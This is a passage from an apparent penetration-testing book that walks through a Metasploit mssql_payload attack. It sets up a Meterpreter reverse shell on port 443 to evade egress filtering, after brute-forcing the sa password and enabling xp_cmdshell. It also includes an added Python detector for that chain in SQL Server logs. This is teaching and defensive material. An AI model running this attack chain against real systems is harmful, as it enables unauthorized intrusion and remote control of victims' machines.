Chapter 6

msf exploit(mssql_payload) > set LPORT 443
LPORT => 443
msf exploit(mssql_payload) > set RHOST 192.168.33.130
RHOST => 192.168.33.130
msf exploit(mssql_payload) > set PASSWORD password123
PASSWORD => password123
msf exploit(mssql_payload) > exploit

[*] Started reverse handler on 192.168.33.129:443
[*] Command Stager progress - 2.78% done (1494/53679 bytes)
[*] Command Stager progress - 5.57% done (2988/53679 bytes)
[*] Command Stager progress - 8.35% done (4482/53679 bytes)

. . . SNIP . . .

[*] Command Stager progress - 97.32% done (52239/53679 bytes)
[*] Sending stage (748032 bytes)
[*] Meterpreter session 1 opened (192.168.33.129:443 -> 192.168.33.130:1699)
meterpreter > 

After selecting the mssql_payload module and setting our payload to meterpreter, all we need to do is set the standard options (LHOST, LPORT, RHOST, and the password we recovered) before starting our Meterpreter session. Using LPORT 443 is a deliberate choice: the reverse connection from the target then looks like outbound HTTPS traffic, which is far more likely to be allowed through egress filtering than an arbitrary high port. The Command Stager lines show the payload being pushed to the target in small chunks through MS SQL itself; once the stage is sent, we have succeeded in opening a Meterpreter session on the target machine.

To recap, in the attack described here, we used the mssql_ping module to locate the MS SQL instance and the mssql_login module to brute-force the MS SQL sa password, which we discovered is password123. We then leveraged the mssql_payload module to communicate with MS SQL and upload a Meterpreter shell through MS SQL, and the shell was presented to us, thereby completely compromising the system. Note that this upload path runs through the xp_cmdshell extended stored procedure, which mssql_payload enables if it is turned off; that is why the sa (sysadmin) password, rather than any low-privileged login, was the key to the whole chain. Once the Meterpreter shell is presented, we know that the exploit was successful and we can continue with post exploitation on this system.
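The same chain leaves a clear trail on the victim. The following added example (not code from the book) parses a constructed SQL Server ERRORLOG excerpt that mimics what this attack produces: a burst of error 18456 failures for sa from one client, the guess that finally lands, and the configuration change that turns on xp_cmdshell. The timestamps, spids and addresses are assumptions; the "Login succeeded" line only appears when login auditing is set to record both failed and successful logins, so the detector does not depend on it.

```python
"""Detect the MS SQL brute-force / xp_cmdshell chain from SQL Server ERRORLOG lines.

Added example, not from the book. The log excerpt below is constructed to
mimic the real ERRORLOG format; dates, spids and addresses are assumptions.
"""
import re
from collections import Counter

# Constructed sample (assumption): six failed sa logins from the attacker,
# one success, the two sp_configure changes mssql_payload needs, and one
# unrelated single failure that must not be flagged.
SAMPLE_ERRORLOG = """\
2011-05-02 10:22:31.10 Logon       Error: 18456, Severity: 14, State: 8.
2011-05-02 10:22:31.10 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.33.129]
2011-05-02 10:22:31.14 Logon       Error: 18456, Severity: 14, State: 8.
2011-05-02 10:22:31.14 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.33.129]
2011-05-02 10:22:31.19 Logon       Error: 18456, Severity: 14, State: 8.
2011-05-02 10:22:31.19 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.33.129]
2011-05-02 10:22:31.23 Logon       Error: 18456, Severity: 14, State: 8.
2011-05-02 10:22:31.23 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.33.129]
2011-05-02 10:22:31.28 Logon       Error: 18456, Severity: 14, State: 8.
2011-05-02 10:22:31.28 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.33.129]
2011-05-02 10:22:31.33 Logon       Error: 18456, Severity: 14, State: 8.
2011-05-02 10:22:31.33 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.33.129]
2011-05-02 10:22:33.02 Logon       Login succeeded for user 'sa'. Connection made using SQL Server authentication. [CLIENT: 192.168.33.129]
2011-05-02 10:22:40.55 spid52      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2011-05-02 10:22:40.60 spid52      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2011-05-02 10:25:01.00 Logon       Error: 18456, Severity: 14, State: 8.
2011-05-02 10:25:01.00 Logon       Login failed for user 'appuser'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.33.50]
"""

FAILED_RE = re.compile(r"Login failed for user '(?P<user>[^']*)'.*\[CLIENT: (?P<client>[^\]]+)\]")
SUCCESS_RE = re.compile(r"Login succeeded for user '(?P<user>[^']*)'.*\[CLIENT: (?P<client>[^\]]+)\]")
CONFIG_RE = re.compile(r"Configuration option '(?P<option>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)")


def parse_errorlog(text):
    """Reduce ERRORLOG lines to (kind, a, b) events in file order.

    login_failed / login_succeeded carry (user, client);
    config_changed carries (option, "old->new"). Other lines are ignored.
    """
    events = []
    for line in text.splitlines():
        if m := FAILED_RE.search(line):
            events.append(("login_failed", m.group("user"), m.group("client")))
        elif m := SUCCESS_RE.search(line):
            events.append(("login_succeeded", m.group("user"), m.group("client")))
        elif m := CONFIG_RE.search(line):
            events.append(("config_changed", m.group("option"),
                           f"{m.group('old')}->{m.group('new')}"))
    return events


def detect_attack_chain(text, threshold=5):
    """Return findings for the three stages of the attack described above.

    brute_force:         a (client, user) pair reaches `threshold` failures
    brute_force_success: that same pair then logs in successfully
    xp_cmdshell_enabled: xp_cmdshell switched from 0 to 1 (what mssql_payload needs)
    Each finding is (kind, user_or_option, client_or_change, failure_count).
    """
    failures = Counter()
    findings = []
    for kind, a, b in parse_errorlog(text):
        if kind == "login_failed":
            failures[(b, a)] += 1  # keyed by (client, user)
            if failures[(b, a)] == threshold:
                findings.append(("brute_force", a, b, threshold))
        elif kind == "login_succeeded":
            if failures[(b, a)] >= threshold:
                findings.append(("brute_force_success", a, b, failures[(b, a)]))
        elif kind == "config_changed" and a == "xp_cmdshell" and b.endswith("->1"):
            findings.append(("xp_cmdshell_enabled", a, b, None))
    return findings


if __name__ == "__main__":
    for finding in detect_attack_chain(SAMPLE_ERRORLOG):
        print(finding)
```

The detector keys failures on (client, user) so one stray typo from a legitimate application login, like the appuser line, never reaches the threshold, while the xp_cmdshell rule fires on its own because enabling that procedure is rare enough on a production instance to warrant a look regardless of how the attacker authenticated.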

Basic Meterpreter Commands

Having successfully compromised the target and gained a Meterpreter console on the system, we can glean more information with some basic Meterpreter commands. Use the help command at any point for more information on how to use Meterpreter.

Capturing a Screenshot

Meterpreter's screenshot command will export an image of the active user's desktop and save it in msfconsole's current working directory, which here is /opt/metasploit3/msf3/, as shown in Figure 6-1.

meterpreter > screenshot
Screenshot saved to: /opt/metasploit3/msf3/yVHXaZar.jpeg

Desktop screen captures offer a great way to learn about a target system. For example, in Figure 6-1, we can see that McAfee antivirus software is installed and running, which means we'll need to be cautious about what we upload to the system. (Chapter 7 discusses antivirus evasion in more detail.)